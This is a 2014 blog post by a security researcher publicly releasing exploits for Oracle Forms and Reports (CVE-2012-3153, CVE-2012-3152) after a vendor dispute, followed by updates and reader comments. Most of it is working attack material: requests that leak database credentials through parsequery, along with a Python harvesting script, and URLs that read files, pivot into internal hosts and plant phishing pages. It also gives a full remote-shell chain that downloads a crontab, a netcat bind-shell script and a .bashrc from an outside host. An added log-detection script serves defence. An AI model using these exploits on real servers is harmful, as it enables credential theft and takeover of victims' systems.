Bitcoin = 13YoRYxzQo87MPPYwiqn2d6EhcufUizsLb

Metasploit module released and in production code base - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/oracle_reports_rce.rb

http://watchguardsecuritycenter.com/2014/01/31/java-ddos-botnet-wswir-episode-93/

Please join us in #vulnhub on freenode! Ethical hackers – Hacker Challenges – Fun group. Tell them @miss_sudo sent you.

UPDATE: 2/8/2014 – IBM ISS Xforce adds Oracle threat but gets the criticality rating wrong. http://xforce.iss.net/xforce/xfdb/79296 Also gets the “Unproven” wrong.

UPDATE: 2/6/2014 – Acunetix adds Oracle Reports detection module. http://www.acunetix.com/?p=11272&preview=true

UPDATE: 2/3/2014 – We are still looking for pre-patched/workaround versions of Oracle Forms and Reports <= 11g, ideally one Linux install and one Windows install. We promise not to damage the system or exceed authorization, and we will also advise on cleaning up after the tests. Please send an email to the address at the bottom of this article if you are able to help us. Thank you.

UPDATE 1/30/2014 – I want to make it clear to everyone that releasing these exploits doesn’t make me smile or giggle. In fact, just the opposite. Just thinking about doing this had my stomach in knots. But this had to be done to get a vendor to take serious vulnerabilities seriously, which in turn will help protect its customers in the future.

Also, don’t say I didn’t warn people about this. http://storify.com/miss_sudo/oracle-reports-exploit-advanced-warnings

Also, chills just ran up my spine as I just realized both vulnerabilities might be wormable. Both allow executing remote code. An Oracle botnet. ugh

Metasploit module to be released soon: https://github.com/rapid7/metasploit-framework/pull/2931

UPDATE 1/29/2014 – We need a vulnerable development install to test metasploit exploits. Please let me know if you have such an environment.

UPDATE: 1/28/2014 – First exploit released https://twitter.com/Mekanismen_/status/428256900841353216 on github https://github.com/Mekanismen/pwnacle-fusion

UPDATE: 1/27/2014 – To those who are writing articles about this, please use NI @root as the organization and not my current employer. Thank you. Also, changed the format to full width due to formatting errors. I will fix this later.

 

Proof of concept for CVE-2012-3153 using Shodan via @felmoltor

I am releasing three exploits to the public domain. After working with Oracle starting about 2 years ago, they refused to treat these vulnerabilities as serious and didn’t appropriately address them. If you give a vulnerability a rating of medium/low it is likely not going to get any attention drawn to it by those who manage Oracle servers. I showed Oracle the videos of getting a remote shell on one of their vulnerable systems and they didn’t budge from their current stance. So, in the spirit of holding vendors accountable to how they handle vulnerabilities, I am now lighting a match and catching the Internet on fire.

First of all, these exploits are insanely stupid. So stupid that it is probably the reason why nobody else discovered them before. I know this doesn’t sound very professional, but who gives you functions, on purpose, to access the file system or other systems? And nobody really caught this?

Videos exist only for the URLPARAMETER vulnerability; they can be found at the links below. They are better watched on YouTube with HD quality selected and in full screen.

http://blog.netinfiltration.com/2013/12/12/hacking-oracle-reports-11g/
http://blog.netinfiltration.com/2013/12/16/getting-a-remote-shell-on-oracle-forms-and-reports-11g/
http://blog.netinfiltration.com/2014/01/19/upcoming-exploit-release-oracle-forms-and-reports-11g/

I have tried to put the word out that these exploits were going to be released, and not one high-level security news publication has published this information so that people can protect themselves. With the recent data breaches such as Target, you would think people would take this seriously. Well, here you go. If you are not protected, your data will likely be compromised, and it is also likely that your network will be compromised as well by chaining various other exploits with these.

I am releasing these to hold vendors responsible for their own vulnerabilities, which includes giving the vulnerabilities a proper criticality rating as well as taking appropriate action to protect users of their product. I have gone above and beyond responsible disclosure here.

First we start off with the PARSEQUERY function, which exists for reasons I cannot fathom. I am not an Oracle expert; I simply see things that need to be tinkered with and tinker with them. I found that you can feed a keymap name to PARSEQUERY and get back the database username/password@database for that keymap. This alone is a serious problem. Oracle did NOT fix this vulnerability; it only obscured it by disabling the diagnostic output.

Request http://server:port/reports/rwservlet/showmap to get the list of keymaps, then feed each keymap name to http://server:port/reports/rwservlet/parsequery?<keymap>.

Exploit code for Oracle Forms and Reports

PARSEQUERY

http://docs.oracle.com/cd/E16764_01/bi.1111/b32121/pbr_cla007.htm#i640592

Description

Use PARSEQUERY to parse an rwservlet query and display the constructed Reports Server command line.

Syntax

http://your_webserver/reports/rwservlet/parsequery[?][server=server_name][&authid=username/password]

CVE-2012-3153

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3153

Oracle Reports Developer – Version 9.0.2.0 to 10.1.2.3 [Release 9i to 10gr2]

Information in this document applies to any platform.
9iAS, 9iDS, 10G (DS and AS), and 10G AS Reports/Forms Standalone Installation

An undocumented behaviour of PARSEQUERY: take a keymap name from the list at /reports/rwservlet/showmap and pass it as the query, and the server expands that keymap into the full Reports Server command line, which includes the database credentials.

http://server:port/reports/rwservlet/parsequery?<keymap>

Results

• Original Query String (GET):

<keymap>

• Result Reports Server Command Line:

expiredays=0 report="<keymap>.rdf" jobname="<keymap>.rdf" desformat=HTML authid=RWUser/ destype=cache userid=account/password@database

An exploit could be written to first fetch showmap, parse out the non-default keymaps, then run a parsequery request for each to grab credentials that could in turn be used to access various applications and/or databases.

Default keymap values that do not return passwords:

barcodepaper
barcodeweb
breakbparam
charthyperlink_ias
charthyperlink_ids
distributionpaper
express
orqa
parmformjsp
pdfenhancements
report_defaultid
report_secure
run
runp
tutorial
xmldata

Any other keymap on an unpatched server should return usernames/passwords including the name of the database.
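The harvesting procedure just described, written out as an added example; this is not code from the post, nor from the Metasploit module linked above. It reads showmap, drops the default keymaps listed above, runs parsequery for each remaining keymap and parses userid=account/password@database out of the "Result Reports Server Command Line". The showmap layout (one "<name>: <command line>" entry per keymap, the cgicmd.dat format), the fetch callable and the server responses are assumptions; the responses are constructed so that it runs offline.

```python
"""Keymap credential audit for CVE-2012-3153 (PARSEQUERY).

Added example, not the author's or Oracle's code. Assumptions: showmap
renders each keymap as "<name>: <command line>" (cgicmd.dat layout) and
fetch(url) returns the response body as text. The responses below are
constructed; point harvest() at a real fetch only with authorisation.
"""
import re

# Default keymaps listed in the post; they do not return passwords.
DEFAULT_KEYMAPS = {
    "barcodepaper", "barcodeweb", "breakbparam", "charthyperlink_ias",
    "charthyperlink_ids", "distributionpaper", "express", "orqa",
    "parmformjsp", "pdfenhancements", "report_defaultid", "report_secure",
    "run", "runp", "tutorial", "xmldata",
}

# Assumed showmap layout: optional HTML tags, then "<keymap>:" at line start.
SHOWMAP_ENTRY = re.compile(r"^\s*(?:<[^>]+>\s*)*([A-Za-z0-9_]+)\s*:", re.M)

# Credential triple exactly as the post shows it in the parsequery output.
USERID = re.compile(r'userid=([^/\s"]+)/([^@\s"]+)@([A-Za-z0-9_.$\-]+)')


def nondefault_keymaps(showmap_body):
    """Return keymap names from showmap output, minus the known defaults."""
    names = []
    for match in SHOWMAP_ENTRY.finditer(showmap_body):
        name = match.group(1)
        if name.lower() not in DEFAULT_KEYMAPS and name not in names:
            names.append(name)
    return names


def extract_credentials(parsequery_body):
    """Parse userid=user/password@db from a parsequery response, or None."""
    match = USERID.search(parsequery_body)
    if not match:
        return None
    user, password, database = match.groups()
    return {"user": user, "password": password, "database": database}


def harvest(base_url, fetch):
    """Map each non-default keymap that leaks credentials to its triple."""
    showmap = fetch(base_url + "/reports/rwservlet/showmap")
    leaked = {}
    for keymap in nondefault_keymaps(showmap):
        body = fetch(base_url + "/reports/rwservlet/parsequery?" + keymap)
        creds = extract_credentials(body)
        if creds:
            leaked[keymap] = creds
    return leaked


# Constructed responses standing in for a vulnerable 10g/11g server.
SAMPLE_BASE = "http://reports.example.test:8888"
SAMPLE_RESPONSES = {
    SAMPLE_BASE + "/reports/rwservlet/showmap": (
        "<html><body><pre>\n"
        "run: report=%1 userid=%2 desformat=%3 destype=cache\n"
        "hrpayroll: report=hrpayroll.rdf desformat=html destype=cache\n"
        "finance_q: report=fin_q.rdf desformat=html destype=cache\n"
        "</pre></body></html>\n"
    ),
    SAMPLE_BASE + "/reports/rwservlet/parsequery?hrpayroll": (
        "Original Query String(GET) :\nhrpayroll\n"
        "Result Reports Server Command Line\n"
        'expiredays=0 report="hrpayroll.rdf" jobname="hrpayroll.rdf" '
        "desformat=HTML authid=RWUser/ destype=cache userid=hr/hrpass1@HRDB\n"
    ),
    # Behaves like a patched server: diagnostic output disabled, no userid.
    SAMPLE_BASE + "/reports/rwservlet/parsequery?finance_q": (
        "Original Query String(GET) :\nfinance_q\n"
    ),
}


def sample_fetch(url):
    """Offline stand-in for an HTTP GET against the constructed server."""
    return SAMPLE_RESPONSES.get(url, "")


if __name__ == "__main__":
    for keymap, creds in harvest(SAMPLE_BASE, sample_fetch).items():
        print(keymap, creds["user"], creds["database"])
```

Replace sample_fetch with a function that performs an HTTP GET and hand harvest() the real base URL. A server where Oracle's workaround has disabled the diagnostic output returns no userid= line, so it is reported as clean; that is what the constructed finance_q response shows.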

From Oracle

1) Please include references to the MOS notes that provide workarounds for 10g in your publication. These are:

CVE-2012-3153: https://support.oracle.com/rs?type=doc&id=279683.1 and https://support.oracle.com/rs?type=doc&id=260243.1

2) Please recommend to customers still using 10g that they upgrade to 11g.

3) Also, please note in your publication that 10g is currently not supported.

URLPARAMETER

http://docs.oracle.com/cd/E15523_01/bi.1111/b32121/pbr_cla008.htm#RSPUB23908

http://docs.oracle.com/cd/E23943_01/bi.1111/b32121/pbr_run006.htm

If you have activated the Reports Server’s URL engine, you can send job requests to the URL engine by using the following command line options:

urlParameter identifies the URL to be placed in the cache. For example, http://www.oracle.com or a JSP report.

jobType is the name of a job type (for example, rwurl) in the server configuration file that is associated with a URL engine.

Note:

For information on activating the URL engine, refer to Section 8.6, “Configuring the URL Engine”.

For example, a request that specifies an external URL for urlParameter might look like the following:

http://your_webserver:portnum/reports/rwservlet?server=ReportsServer+jobType=rwurl+urlParameter="http://www.oracle.com"+destype=mail+desname=foo@bar.com+desformat=htmlcss

Alternatively, a request that specifies a JSP report for urlParameter would look like the following:

http://your_webserver:portnum/reports/rwservlet?server=ReportsServer+jobType=rwurl+destype=cache+urlParameter="http%3A%2F%2Flocalhost%2Ffoo.jsp%3Fuserid%3Dscott%2Ftiger@oraDB%3Fserver%3DreportsServer"

CVE-2012-3152

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3152

Oracle Reports Developer – Version 9.0.2.0 to 10.1.2.3 [Release 9i to 10gr2]

Information in this document applies to any platform.
9iAS, 9iDS, 10G (DS and AS), and 10G AS Reports/Forms Standalone Installation

Exploiting URLPARAMETER

The following protocols are allowed by default (before 12.x, and on 11.x before the patch):

file
ftp
gopher
http
https
mailto

Example: Browsing/downloading files

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22file:///%22

This returns a directory listing of the root filesystem in the browser. Modify the path to change directory or to download a file: anything the Oracle server's OS account can read.

Example: Loading a phishing page in the browser. The URL can be sent to a victim; the Oracle server fetches the page itself and serves it from its own trusted hostname.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/phishing.html%22

Example: Loading a web page on the server itself that is blocked from the outside by a firewall (here the Enterprise Manager console on port 1156).

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://127.0.0.1:1156/em%22

Example: Loading another server's web page on the private network.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://10.1.1.25%22

Example: Proxying through another trusted Oracle Reports server by naming it in server=. Every protocol and scenario above works the same way against that server.

http://server:port/reports/rwservlet?report=test.rdf+server=rep_server+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22file:///%22

Now to add the technique the University of Texas discovered on top of this: combine destype=file with desname=<path>, and whatever URLPARAMETER fetched is written to that path on the server instead of being returned to the browser.

This changed the original vulnerability on a massive scale. Remember that all of the protocols above work with this. Some scenarios are:

  1. Plant a phishing page targeting employees and have the server email an invitation out to visit the page.
  2. Gain a remote shell, then, if SSH keys without passphrases exist, use them to reach other systems behind the network via SSH. You can also download the SSH keys to your own computer and access those systems directly if they do not have port 22 blocked.
  3. Directly access the database using sqlplus.sh /nolog and gain SYSDBA with no password (OS authentication, since you are running as the oracle account).

Example: Planting external files on the local server. The desname below is the OHS document root, so the planted page is served by the Oracle HTTP Server itself.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/login.html+JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/login.html%22

Example: Gaining a remote shell

Create 3 files

  1. crontab
  2. oracleshell.sh
  3. .bashrc

Place these on a site that the Oracle server can access.

The contents of the files:

Crontab File

# Every minute: make the dropped script executable and run it.
* * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
* * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1

Netcat Shell Script

#!/bin/sh
# Start a netcat bind shell on TCP 3333 unless one is already listening.
# POSIX sh only: the crontab above runs this with "sh", so no bashisms
# ([[ ]], &>, $RANDOM); $$ gives a per-run fifo name instead.
fifo="._$$"
if netstat -nat | grep -q ':3333 .*LISTEN'; then
    echo "shell already started"
else
    mkfifo "$fifo"
    nc -lk 3333 0<"$fifo" | /bin/bash >"$fifo" 2>&1 &
fi

.bashrc

# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# User specific aliases and functions
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab

The following URLs plant the files. The desname paths must match the paths referenced from the crontab and .bashrc above.

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab+JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/crontab%22

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh+JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/oracleshell.sh%22

http://server:port/reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/home/oracle/.bashrc+JOBTYPE=rwurl+URLPARAMETER=%22http://netinfiltration.com/.bashrc%22

For the shell to spawn, someone needs to log into the oracle account so that .bashrc installs the crontab. Stopping a service would likely get this to happen more quickly, since an administrator will log in to restart it.
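The defender's side of both the URLPARAMETER examples above and the file-planting requests just used for the shell, as an added example that is not part of the original post. It scans web-server access-log lines for the request shapes this article documents: JOBTYPE=rwurl with URLPARAMETER (CVE-2012-3152), whether the fetched content is read back with destype=cache or written to disk with destype=file+desname=<path>, plus probes of /rwservlet/showmap and /rwservlet/parsequery (CVE-2012-3153). The log lines are constructed in Common Log Format, and the internal address ranges are an assumption a deployment would tune.

```python
"""Access-log detection for rwservlet abuse (CVE-2012-3152 / CVE-2012-3153).

Added example, not the author's tooling. The log lines are constructed and
the internal-network list is an assumption; adjust both for a real site.
"""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Request line of a Common Log Format entry: "GET /path HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Assumed "internal" ranges; a server reaching into these is an SSRF pivot.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "::1/128")]


def parse_rwservlet_args(path):
    """rwservlet separates arguments with '+' (it also accepts '&'), and the
    post wraps URLPARAMETER in %22 quotes; return a lowercase-keyed dict."""
    query = path.split("?", 1)[1] if "?" in path else ""
    args = {}
    for token in re.split(r"[+&]", query):
        if "=" in token:
            key, value = token.split("=", 1)
            args[key.lower()] = unquote(value).strip('"')
    return args


def is_internal(host):
    """True for loopback/RFC1918 targets; bare hostnames are treated as external."""
    if host in ("localhost", ""):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def analyse_request(path):
    """Return finding labels for one request path; [] means nothing suspicious."""
    findings = []
    lower = path.lower()
    if "/reports/rwservlet" not in lower:
        return findings
    if "/rwservlet/showmap" in lower or "/rwservlet/parsequery" in lower:
        findings.append("keymap-disclosure-probe")
    args = parse_rwservlet_args(path)
    if args.get("jobtype", "").lower() == "rwurl":
        findings.append("rwurl")
        target = urlsplit(args.get("urlparameter", ""))
        if target.scheme.lower() == "file":
            findings.append("file-read")
        elif target.scheme:
            findings.append("ssrf-internal" if is_internal(target.hostname or "")
                            else "ssrf-external")
        if args.get("destype", "").lower() == "file":
            findings.append("file-write:" + args.get("desname", ""))
    return findings


def scan_log(lines):
    """Return (request path, findings) for every suspicious request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            findings = analyse_request(match.group("path"))
            if findings:
                hits.append((match.group("path"), findings))
    return hits


# Constructed OHS access-log lines: one benign report run, then the probes
# and requests from this article.
SAMPLE_LOG = [
    '10.1.1.40 - - [28/Jan/2014:10:00:01 -0600] "GET /reports/rwservlet?report=sales.rdf+desformat=html+destype=cache HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Jan/2014:10:00:02 -0600] "GET /reports/rwservlet/showmap HTTP/1.1" 200 1440',
    '203.0.113.9 - - [28/Jan/2014:10:00:03 -0600] "GET /reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22file:///%22 HTTP/1.1" 200 812',
    '203.0.113.9 - - [28/Jan/2014:10:00:04 -0600] "GET /reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER=%22http://127.0.0.1:1156/em%22 HTTP/1.1" 200 2231',
    '203.0.113.9 - - [28/Jan/2014:10:00:05 -0600] "GET /reports/rwservlet?report=test.rdf+desformat=html+destype=file+desname=/home/oracle/.bashrc+JOBTYPE=rwurl+URLPARAMETER=%22http://203.0.113.9/.bashrc%22 HTTP/1.1" 200 0',
]


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(", ".join(findings), path)
```

Any rwurl job from the outside is worth an alert on a server that does not intentionally expose the URL engine; the file-read and file-write labels are the ones that map directly to the credential theft and shell-planting steps in this article. Feed it the real OHS access log and tune INTERNAL_NETS to your address plan.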

There are probably a lot more scenarios you can come up with. These are some nasty vulnerabilities, and with all the data breaches in the news lately, those will be shit compared to this one.

From Oracle

1) Please include references to the MOS notes that provide workarounds for 10g in your publication. These are:

CVE-2012-3152: https://support.oracle.com/rs?type=doc&id=234993.1

2) Please recommend to customers still using 10g that they upgrade to 11g.

3) Also, please note in your publication that 10g is currently not supported.

Dana Lane Taylor

http://netinfiltration.org
@netinfiltration
@miss_sudo
security@netinfiltration.org

News

http://threatpost.com/researcher-warns-of-critical-flaws-in-oracle-servers/103961

http://blogs.csoonline.com/network-security/2951/researcher-discloses-critical-flaws-oracle-forms-and-reports

http://searchsecurity.techtarget.com/news/2240213241/Researcher-releases-critical-Oracle-Forms-and-Reports-vulnerabilities

https://isc.sans.edu/forums/diary/Oracle+Reports+Vulnerability/17531

http://securityaffairs.co/wordpress/21805/cyber-crime/critical-vulnerabilities-oracle-servers-wild.html

http://www.securityweek.com/giving-oracle-researcher-discloses-critical-vulnerabilities-oracle-forms-and-reports

http://adtmag.com/articles/2014/01/30/oracle-cloud-world.aspx all of your data are belong to @miss_sudo

“To the best of our knowledge an Oracle database has not been broken into for a couple of decades,” he said, “by anybody.” He earned some applause by adding, “It’s so secure [that] there are people that complain!”

Oracle systems separate the data from administrator access, Ellison pointed out, which adds to the security of the systems. “Mr. Snowden never could have gotten into an Oracle database,” he said.

But in a recent blog post, security researcher Dana Taylor claimed to have discovered two vulnerabilities in Oracle Forms and Reports, “…which affected 10.x and 11.x and possibly older versions,” and which she reported to Oracle. The company responded to her reports, she wrote in the post, by saying that these were not vulnerabilities. Oracle was unavailable for comment at press time.

 

Your thoughts here

  1. Digital Human

    Nice job ;) Thx

  2. t

    LIES!
    - oracle is unbreakable
    - everything is approved on fd

  3. @AnonymousCow4rd

    Great Job @miss_sudo!

  4. ...

    Thanks for posting this.

    But how sad… Come on, Oracle, get your S**T together!

  5. good exposure and process note. great! hope oracle secure it and say thanks to you.

    • ni@root

      I don’t think Oracle likes me very much right now and I don’t blame them. So I expect no thank you from them but hope this is a wakeup call for them to take serious vulnerabilities, seriously. If Oracle keeps their current stance then instead of responsible disclosure, people will start releasing zero days. They really need to take this shit seriously.

  6. Great job! However, I am not surprised by Oracle’s response. It is incredibly frustrating to work any security issues with Oracle Corp.

    https://www.dbdr.com/potential-logging-of-e-business-suite-passwords/
    This security issue was introduced if you installed any of the CPU patches July 2012 to April 2013.
    Oracle eventually fixed it, but it took nearly a year, and even after they released the fix, they did not go back and clean up the logs.
    Getting Oracle to fess up to security issues is like pulling teeth, and getting them to fix them correctly is worse.

    Jeff Kayser
    Database Doctor, Inc.
    http://www.dbdr.com

  7. Oracle Reports 10.1.2 is bundled with Oracle E-Business Suite R12.0, R12.1, and R12.2 (latest version). It is bundled in Oracle Application Server 10.1.2 (aka Oracle Fusion Middleware 10gR2).

    If you are using Oracle Reports 10.1.2 in that context, it is supported:

    “Customers running Oracle Fusion Middleware 10gR2 and 10gR3 in the Oracle E-Business Suite version 12 internal technology stack will remain supported for the duration of the support period for Oracle E-Business Suite 12.”

    http://www.oracle.com/us/support/library/lifetime-support-applications-069216.pdf

    Page 8

    I looked for an MOS note describing how to upgrade E-Business Suite 12 to Oracle Reports 11gR1, but did not find one. As far as I know, it is not a supported configuration (yet).

    For companies running Oracle E-Business Suite 12, this is a VERY serious problem. It needs to be worked immediately by Oracle.

    Jeff Kayser
    Database Doctor, Inc.
    http://www.dbdr.com

    • ni@root

      I think what we need is to build a wiki that shows past handling of Oracle vulnerabilities by Oracle and the impact on its customers.

  8. ni@root

    Jeff, I think a company that sells databases and applications that house the world’s most sensitive data needs to rethink their support policy. Not everyone updates to the latest and greatest due to either cost or complexity. Thanks for sharing your own nightmare story!
